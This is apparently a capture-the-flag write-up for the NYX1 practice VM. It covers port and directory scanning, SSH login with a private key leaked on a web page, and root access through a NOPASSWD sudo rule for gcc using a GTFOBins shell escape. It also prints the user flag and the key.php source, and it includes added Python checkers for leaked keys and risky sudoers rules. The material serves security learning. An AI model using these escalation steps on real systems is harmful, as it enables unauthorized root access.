NYX1

NYX1 box

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.138
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80 192.1.1.138
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA)
| 256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA)
|_ 256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: nyx
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:A7:F7:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.27 seconds

Ports 22 and 80 are open; the operating system is Linux.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.138
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00027s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

The UDP scan results are for reference only.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.138
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:29 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00023s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
|_ /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.85 seconds

Meanwhile, start a gobuster directory brute-force.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 -x txt,zip,sql,rar,php
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.138/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,zip,sql,rar,php
[+] Timeout: 10s
===============================================================
2023/06/16 22:29:24 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/key.php (Status: 200) [Size: 287]
/.php (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 1319237 / 1323366 (99.69%)===============================================================
2023/06/16 22:31:41 Finished
===============================================================

Among the directory brute-force results, key.php is the interesting one, but after opening the page there is no obvious point to exploit; attempts at bypassing and brute-forcing the key both failed.

Private key leak

The scan with nmap's built-in vuln scripts reported a PHP file.

Its content looks like a private key file, and the page title leaks some sensitive information: "mpampis key". Guessing that this is mpampis's private key, I try to log in with it. At first I forgot about the file permission issue; only after changing the permissions to 600 did the login succeed.

┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ echo -e "rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==" | base64 -d
�!M
mpampis@nyx

┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ ssh -i private mpampis@192.1.1.138
The authenticity of host '192.1.1.138 (192.1.1.138)' can't be established.
ED25519 key fingerprint is SHA256:y+UuWVNQjou5NV3bhJKmkFBqomxtGR0c5ydJPwmIz+E.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.138' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'private' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "private": bad permissions
mpampis@192.1.1.138's password:
Permission denied, please try again.
mpampis@192.1.1.138's password:
Permission denied, please try again.
mpampis@192.1.1.138's password:
mpampis@192.1.1.138: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ chmod 600 private

┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ ssh -i private mpampis@192.1.1.138
Linux nyx 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
███▄▄▄▄ ▄██ ▄ ▀████ ▐████▀
███▀▀▀██▄ ███ ██▄ ███▌ ████▀
███ ███ ███▄▄▄███ ███ ▐███
███ ███ ▀▀▀▀▀▀███ ▀███▄███▀
███ ███ ▄██ ███ ████▀██▄
███ ███ ███ ███ ▐███ ▀███
███ ███ ███ ███ ▄███ ███▄
▀█ █▀ ▀█████▀ ████ ███▄
Last login: Fri Aug 14 19:15:05 2020 from 192.168.1.18
mpampis@nyx:~$
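As an added defensive check (not code from the original writeup): a Python scanner that walks a web root for leaked private-key material and, for unencrypted OpenSSH keys, recovers the key comment the same way the base64 tail above was decoded by hand (a length-prefixed comment followed by 1,2,3.. padding), so the affected account can be identified and its key rotated. The sample key is constructed inline from dummy bytes; only the comment "mpampis@nyx" is taken from the writeup.

```python
import base64
import os
import struct

MARKERS = (b"-----BEGIN OPENSSH PRIVATE KEY-----", b"-----BEGIN RSA PRIVATE KEY-----",
           b"-----BEGIN EC PRIVATE KEY-----", b"-----BEGIN PRIVATE KEY-----")

def comment_from_tail(data):
    """Strip the 1,2,3.. padding that ends an unencrypted openssh-key-v1 private section,
    then return the length-prefixed string ending right there: the comment (assumed NUL-free)."""
    end = len(data)
    k = data[-1] if data else 0
    if 0 < k < 8 and data[-k:] == bytes(range(1, k + 1)):
        end -= k
    for n in range(min(end - 3, 256)):  # n is the candidate comment length
        if struct.unpack(">I", data[end - n - 4:end - n])[0] == n:
            return data[end - n:end]
    return None

def openssh_comment(data):
    """Comment of an OpenSSH key embedded anywhere in data (e.g. an HTML page); None if the key is
    encrypted or not openssh-key-v1. The private section is the blob's last field, so tails coincide."""
    start, stop = data.find(MARKERS[0]), data.find(b"-----END OPENSSH PRIVATE KEY-----")
    if start < 0 or stop < start:
        return None
    blob = base64.b64decode(b"".join(data[start + len(MARKERS[0]):stop].split()))
    if not blob.startswith(b"openssh-key-v1\x00\x00\x00\x00\x04none"):  # magic + ciphername "none"
        return None
    return comment_from_tail(blob)

def find_exposed_keys(root):
    """Walk a directory such as the web root; return sorted (relative path, comment) hits."""
    hits = []
    for d, _, files in os.walk(root):
        for path in (os.path.join(d, f) for f in files):
            with open(path, "rb") as fh:
                data = fh.read()
            if any(m in data for m in MARKERS):
                hits.append((os.path.relpath(path, root), openssh_comment(data)))
    return sorted(hits)

def build_sample_key(comment):
    """CONSTRUCTED sample in openssh-key-v1 layout with dummy key bytes; not a real key."""
    s = lambda b: struct.pack(">I", len(b)) + b  # SSH length-prefixed string
    pub = s(b"ssh-ed25519") + s(b"\x11" * 32)
    priv = b"\x01\x02\x03\x04" * 2 + s(b"ssh-ed25519") + s(b"\x11" * 32) + s(b"\x22" * 64) + s(comment)
    priv += bytes(range(1, 9 - len(priv) % 8)) if len(priv) % 8 else b""  # pad to the 8-byte block
    blob = b"openssh-key-v1\x00" + s(b"none") + s(b"none") + s(b"") + struct.pack(">I", 1) + s(pub) + s(priv)
    return MARKERS[0] + b"\n" + base64.b64encode(blob) + b"\n-----END OPENSSH PRIVATE KEY-----\n"
```

Running find_exposed_keys over the document root (or a backup of it) is the check that would have caught this key before the vuln scripts did; a hit with a non-None comment names the account whose key must be rotated.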

Host information gathering

mpampis@nyx:~$ cat user.txt 
2cb67a256530577868009a5944d12637
mpampis@nyx:~$ ls -liah
total 36K
138973 drwxr-xr-x 4 mpampis mpampis 4.0K Aug 14 2020 .
19 drwxr-xr-x 3 root root 4.0K Aug 14 2020 ..
139223 -rw------- 1 mpampis mpampis 490 Aug 14 2020 .bash_history
138974 -rw-r--r-- 1 mpampis mpampis 220 Aug 14 2020 .bash_logout
138975 -rw-r--r-- 1 mpampis mpampis 3.5K Aug 14 2020 .bashrc
139220 drwxr-xr-x 3 mpampis mpampis 4.0K Aug 14 2020 .local
138976 -rw-r--r-- 1 mpampis mpampis 807 Aug 14 2020 .profile
139214 drwx------ 2 mpampis mpampis 4.0K Aug 14 2020 .ssh
138981 -rw-r--r-- 1 root root 33 Aug 14 2020 user.txt
mpampis@nyx:~$ tail -n 20 .bash_history
cd /tmp
bash exp.sh
exit
bash exp.sh
ls -la
cat exp.sh
chmod 04755 rootshell
bash exp.sh
ls -la
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
which screen
exit
cd /tmpb
cd /tmp
bash exp.sh
screen -r
bash exp.sh
screen -S listen_for_exception
exit
exit

mpampis@nyx:/tmp$ ls
systemd-private-2647caf04ec346c69dee7cb0c91684b3-apache2.service-WJsXbP
systemd-private-2647caf04ec346c69dee7cb0c91684b3-systemd-timesyncd.service-sGyxMv
mpampis@nyx:/tmp$ cd -
/home/mpampis
mpampis@nyx:~$ cat .bash_history | grep "exp.sh"
bash exp.sh
bash exp.sh
bash exp.sh
cat exp.sh
bash exp.sh
bash exp.sh
bash exp.sh

Privilege escalation

The information in .bash_history is of little use. sudo -l shows that gcc may be run as root without a password; with the help of GTFOBins, a method is quickly found.

mpampis@nyx:~$ sudo -l
Matching Defaults entries for mpampis on nyx:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mpampis may run the following commands on nyx:
(root) NOPASSWD: /usr/bin/gcc
mpampis@nyx:~$ cd /tmp
mpampis@nyx:/tmp$ sudo gcc -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
# cd /root
# ls
root.txt
# cat root.txt
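As an added defensive check (not part of the writeup): a small sudoers auditor in Python that parses user rules and flags the root-equivalent ones, such as the NOPASSWD gcc entry above, since any compiler, editor or pager that can spawn a child process hands over root exactly as the GTFOBins entry shows. The sample sudoers is constructed to match the sudo -l output; the backup rule and its wrapper path are hypothetical.

```python
import re

# Binaries that hand the caller a shell or arbitrary command execution when run as root
# (the writeup's gcc is one); an illustrative subset, not an exhaustive list.
SHELL_CAPABLE = {"gcc", "cc", "g++", "make", "vim", "vi", "nano", "less", "more",
                 "find", "awk", "env", "python3", "perl", "bash", "sh"}

RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<body>.+)$")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")

def parse_sudoers(text):
    """Parse plain 'user host=(runas) [TAG:] cmd, cmd' rules; Defaults/aliases/includes are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE.match(line)
        if not line or line.startswith(SKIP) or not m:
            continue
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"  # "(user[:group])"
        for spec in m["body"].split(","):
            tags, cmd = [], spec.strip()
            while ":" in cmd and cmd.split(":", 1)[0].strip().isupper():  # NOPASSWD:, SETENV: ...
                tags.append(cmd.split(":", 1)[0].strip()); cmd = cmd.split(":", 1)[1].strip()
            rules.append({"user": m["user"], "runas": runas, "nopasswd": "NOPASSWD" in tags, "cmd": cmd})
    return rules

def risky_rules(rules):
    """Return (user, cmd, PASSWD|NOPASSWD, reason) for every root-equivalent rule."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        cmd, exe = r["cmd"], (r["cmd"].split() or [""])[0].rsplit("/", 1)[-1]
        reason = ("ALL commands as root" if cmd == "ALL" else
                  f"{exe} can spawn a root shell (GTFOBins-style escape)" if exe in SHELL_CAPABLE else
                  "wildcard in command argument" if "*" in cmd else None)
        if reason:
            findings.append((r["user"], cmd, "NOPASSWD" if r["nopasswd"] else "PASSWD", reason))
    return findings

# CONSTRUCTED sudoers: Debian's default group rule, the rule behind the box's 'sudo -l'
# output, and a safer shape (fixed wrapper script; the /usr/local/sbin path is hypothetical).
SAMPLE_SUDOERS = """\
%sudo   ALL=(ALL:ALL) ALL
mpampis ALL=(root) NOPASSWD: /usr/bin/gcc
backup  ALL=(root) NOPASSWD: /usr/local/sbin/run-backup.sh
"""

def audit_sample():
    return risky_rules(parse_sudoers(SAMPLE_SUDOERS))
```

The fix for a finding like mpampis's is to drop the compiler from sudoers entirely or replace it with a fixed, non-interactive wrapper script, as the backup rule illustrates.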

Supplement: the key.php file

# cat key.php
<?php
$key = $_POST['key'];

if ($key == '1165685715469') {
    header("Location: d41d8cd98f00b204e9800998ecf8427e.php");
    exit;
} elseif ($key == "admin" or $key == "root") {
    echo "<center><h3>really? lol</h3></center>";
} else {
    echo "<center><h3>try harder kiddo</h3></center>";
}
?>

<html>
<head>
    <title>key</title>
</head>
<body>
    <center>
        <h2>can u find the key!?</h2>
        <form action="" method="POST">
            Enter the key: <input type="text" name="key"/>
            <input type="submit" value="submit">
        </form>
    </center>
</body>
</html>

NYX1
https://i3eg1nner.github.io/2023/06/1d78c8deaa4a.html
Author: I3eg1nner
Published: June 17, 2023